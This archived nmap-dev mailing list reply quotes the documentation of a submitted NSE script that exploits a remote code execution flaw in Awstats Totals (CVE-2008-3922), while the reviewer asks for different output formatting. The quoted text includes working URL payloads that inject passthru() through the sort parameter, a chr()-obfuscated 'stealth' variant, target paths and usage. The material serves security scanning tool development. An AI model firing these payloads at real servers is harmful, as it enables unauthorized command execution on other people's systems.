Nmap Development mailing list archives

Previous By Date Next
Previous By Thread Next

Re: http-awstatstotals-exec - Remote code execution exploit for Awstats totals 1.0-1.14

From: Toni Ruottu <toni.ruottu () iki fi>
Date: Mon, 11 Jul 2011 11:59:00 +0300
Could you change the output to look more like the output of
smtp-vuln-cve2010-4344.nse? See
http://nmap.org/nsedoc/scripts/smtp-vuln-cve2010-4344.html for an
example.

On Mon, Jul 11, 2011 at 12:43 PM, Paulino Calderon
<paulino () calderonpale com> wrote:

Hi nmap-dev,

description = [[
 http-awstatstotals-exec exploits a remote code execution vulnerability in
Awstats Totals 1.0 up to 1.14 and possibly other products based on it. It
works on PHP4 and PHP5 with magic quotes enabled. [CVE: 2008-3922]

 Stealth mode encodes the command string using PHP's chr() function. Ex.
 * Normal mode:
<code>?sort={%24{passthru%28$_GET[CMD]%29}}{%24{exit%28%29}}&CMD=uname%20-a</code>
 * Stealth mode:
<code>?sort={%24{passthru%28chr(117).chr(110).chr(97).chr(109).chr(101).chr(32).chr(45).chr(97)%29}}{%24{exit%28%29}}</code>

Common paths for Awstats Total:
* /awstats/index.php
* /awstatstotals/index.php
* /awstats/awstatstotals.php
]]

---
-- @usage
-- nmap --script http-awstatstotals-exec.nse --script-args
'http-awstatstotals-exec.cmd="uname -a", http-awstatstotals-exec.stealth,
http-awstatstotals-exec.uri=/awstats/index.php' -p80 <host/ip>
--
-- @output
-- PORT   STATE SERVICE REASON
-- 80/tcp open  http    syn-ack
-- |_http-awstatstotals-exec.nse: Linux 2.4.19 #1 Son Apr 14 09:53:28 CEST
2002 i686 GNU/Linux
--
-- @args http-awstatstotals-exec.uri Awstats Totals URI including path
-- @args http-awstatstotals-exec.cmd Command to execute
-- @args http-awstatstotals-exec.stealth Stealth mode encodes command
payload using PHP's chr()
-- @args http-awstatstotals-exec.outfile Output file
---


--
Paulino Calderón Pale
Web: http://calderonpale.com
Twitter: http://www.twitter.com/paulinocaIderon


_______________________________________________
Sent through the nmap-dev mailing list
http://cgi.insecure.org/mailman/listinfo/nmap-dev
Archived at http://seclists.org/nmap-dev/


_______________________________________________
Sent through the nmap-dev mailing list
http://cgi.insecure.org/mailman/listinfo/nmap-dev
Archived at http://seclists.org/nmap-dev/
Previous By Date Next
Previous By Thread Next

Current thread: